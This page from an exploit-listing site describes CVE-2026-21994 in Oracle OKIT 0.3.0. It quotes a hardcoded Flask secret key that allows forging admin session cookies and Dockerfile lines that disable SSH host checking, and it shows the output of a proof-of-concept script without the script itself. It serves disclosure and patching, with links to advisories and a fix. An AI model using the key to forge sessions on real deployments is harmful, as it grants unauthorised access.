Share
## https://sploitus.com/exploit?id=21BAAEAD-5BD1-5CDB-8891-6DFC730437FD
# CVE-2026-21994

 


## Summary

Oracle OKIT (oci-designer-toolkit) version 0.3.0 contains two critical misconfigurations that chain into an unauthenticated full takeover. A hardcoded Flask `SECRET_KEY` exposed in the public repository allows any attacker to forge a valid admin session cookie โ€” no credentials required. Separately, the Docker image disables SSH host verification entirely, enabling a network attacker to intercept OCI API keys and private keys during infrastructure deployments.


## Vulnerability

**1. Hardcoded `SECRET_KEY` โ€” `okitclassic/okitserver/config.py:4`**

```python
SECRET_KEY='8980ffsd675747jjjh'
```

Flask uses this key to sign session cookies. Since it is hardcoded in a public repo, an attacker can forge a valid admin cookie and access the OKIT dashboard with zero credentials.

---

**2. SSH Host Verification Disabled โ€” `Dockerfile:41`**

```dockerfile
&& echo '  StrictHostKeyChecking no' >> /etc/ssh/ssh_config \
&& echo '  UserKnownHostsFile=/dev/null' >> /etc/ssh/ssh_config \
```

The container never checks SSH host fingerprints. A network attacker can MitM deployments and steal OCI credentials.


## PoC

Run `exploit.py` inside the cloned repo directory:

```bash
python3 exploit.py
```

```
[*] Scanning okitclassic/okitserver/config.py ...
[!] VULNERABLE โ€” Hardcoded SECRET_KEY found: 8980ffsd675747jjjh
[+] Authentication bypass possible with zero credentials.

[*] Scanning Dockerfile ...
[!] VULNERABLE โ€” SSH host verification is DISABLED.
[+] Network attacker can MitM deployments and steal OCI credentials.

[*] Forging admin session cookie ...
[!] SUCCESS โ€” Forged cookie: .eJwlzj0OgkAQBeC7bG1...
```


## Advisories

| | |
|---|---|
| **CVE ID** | [CVE-2026-21994](https://nvd.nist.gov/vuln/detail/CVE-2026-21994) |
| **GitHub Advisory** | [GHSA-g6qw-3gmw-m78m](https://github.com/advisories/GHSA-g6qw-3gmw-m78m) |
| **CWE** | [CWE-284 โ€” Improper Access Control](https://cwe.mitre.org/data/definitions/284.html) |
| **Oracle Advisory Mapping** | [oracle.com/security-alerts/public-vuln-to-advisory-mapping](https://www.oracle.com/security-alerts/public-vuln-to-advisory-mapping.html) |
| **Oracle CVE Reference** | [oracle.com/security-alerts/all-oracle-cves](https://www.oracle.com/security-alerts/all-oracle-cves-outside-other-oracle-public-documents.html) |
| **Fix** | [oracle/oci-designer-toolkit#780](https://github.com/oracle/oci-designer-toolkit/pull/780) |

---

## Credit

Discovered and reported by **Gouri Sankar A** โ€” [g0w6y](https://github.com/g0w6y)